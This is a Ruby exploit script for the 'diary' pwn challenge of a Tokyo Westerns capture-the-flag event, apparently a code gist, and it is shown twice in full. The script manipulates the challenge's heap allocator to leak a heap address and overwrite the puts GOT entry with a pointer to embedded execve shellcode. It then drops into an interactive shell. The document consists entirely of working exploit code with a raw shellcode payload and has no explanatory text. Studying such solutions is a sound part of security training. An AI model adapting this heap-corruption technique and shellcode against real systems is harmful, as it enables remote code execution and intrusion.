david942j/diary.rb Secret

## diary.rb
#!/usr/bin/env ruby
#encoding: ascii-8bit
  require_relative '../zocket/zocket'
  require 'pry'
  require 'heapinfo'
# *- end of default code

$HOST, $PORT = 'pwn1.chal.ctf.westerns.tokyo', 13856
$local = false
($HOST = '0'; $local = true) if ARGV.empty?
$z = Zocket.new $HOST, $PORT
def z;$z;end
$h = heapinfo('diary')
def h;$h;end
#================= Exploit Start ====================
z.gets("Exit\n>> ")
def add(day, sz, data)
  z.puts 1
  z.puts "1970/02/%02d" % day
  z.puts sz
  z.write data
  z.sock.flush
  z.gets("Exit\n>> ", do_log: false)
  day
end
def del(day)
  z.puts 3
  z.puts "1970/02/%02d" % day
  z.gets("Exit\n>> ", do_log: false)
end

def show(day)
  z.puts 2
  z.puts "1970/02/%02d" % day
  z.gets("Input date ...", do_log:false)
  z.gets
  s = z.gets
  z.gets("Exit\n>> ", do_log: false)
  p s[0..-2] # rm \n
end


id = add(2, 24, 'xd')
id2 = add(4, 24, 'BB')
del(id)
id = add(2, 0x100, 'A')
del(id2)
id3 = add(6, 24, 'A')
heap_base = u64(show(id3)) & -4096
p "heap_base: %x" % heap_base
del(id)
del(id3) # make heap clean~

sm = add(2, 24, 'small')
sc="H\xb8\x01\x01\x01\x01\x01\x01\x01\x01PH\xb8/.c`ri\x01\x01H1\x04$h;\x00\x00@XH\x89\xe71\xf6\x99\x0f\x05"
fail if sc.include?"\n"
lg = add(4, 0x100, p64([0,0])+"\xeb\x1e".ljust(0x20,"\x90")+sc)
del(sm)
add(6, 0x60, 'BBBBBB')
puts_got = 0x602020
sc_addr = heap_base+0x88
add(8, 24, p64(puts_got-16)+p64(sc_addr)+ p64(0x20) + 0x28.chr)
# $stdin.gets
z.puts 3
z.puts "1970/02/%02d" % lg

heap = nil
h.debug{
  heap = HeapInfo::Helper.maps_of(h.pid).scan(/^.*rwxp/)[0].split('-')[0].to_i(16)
  h.x 20, heap if heap
}

z.interact
	#!/usr/bin/env ruby
	#encoding: ascii-8bit
	require_relative '../zocket/zocket'
	require 'pry'
	require 'heapinfo'
	# *- end of default code

	$HOST, $PORT = 'pwn1.chal.ctf.westerns.tokyo', 13856
	$local = false
	($HOST = '0'; $local = true) if ARGV.empty?
	$z = Zocket.new $HOST, $PORT
	def z;$z;end
	$h = heapinfo('diary')
	def h;$h;end
	#================= Exploit Start ====================
	z.gets("Exit\n>> ")
	def add(day, sz, data)
	z.puts 1
	z.puts "1970/02/%02d" % day
	z.puts sz
	z.write data
	z.sock.flush
	z.gets("Exit\n>> ", do_log: false)
	day
	end
	def del(day)
	z.puts 3
	z.puts "1970/02/%02d" % day
	z.gets("Exit\n>> ", do_log: false)
	end

	def show(day)
	z.puts 2
	z.puts "1970/02/%02d" % day
	z.gets("Input date ...", do_log:false)
	z.gets
	s = z.gets
	z.gets("Exit\n>> ", do_log: false)
	p s[0..-2] # rm \n
	end


	id = add(2, 24, 'xd')
	id2 = add(4, 24, 'BB')
	del(id)
	id = add(2, 0x100, 'A')
	del(id2)
	id3 = add(6, 24, 'A')
	heap_base = u64(show(id3)) & -4096
	p "heap_base: %x" % heap_base
	del(id)
	del(id3) # make heap clean~

	sm = add(2, 24, 'small')
	sc="H\xb8\x01\x01\x01\x01\x01\x01\x01\x01PH\xb8/.c`ri\x01\x01H1\x04$h;\x00\x00@XH\x89\xe71\xf6\x99\x0f\x05"
	fail if sc.include?"\n"
	lg = add(4, 0x100, p64([0,0])+"\xeb\x1e".ljust(0x20,"\x90")+sc)
	del(sm)
	add(6, 0x60, 'BBBBBB')
	puts_got = 0x602020
	sc_addr = heap_base+0x88
	add(8, 24, p64(puts_got-16)+p64(sc_addr)+ p64(0x20) + 0x28.chr)
	# $stdin.gets
	z.puts 3
	z.puts "1970/02/%02d" % lg

	heap = nil
	h.debug{
	heap = HeapInfo::Helper.maps_of(h.pid).scan(/^.*rwxp/)[0].split('-')[0].to_i(16)
	h.x 20, heap if heap
	}

	z.interact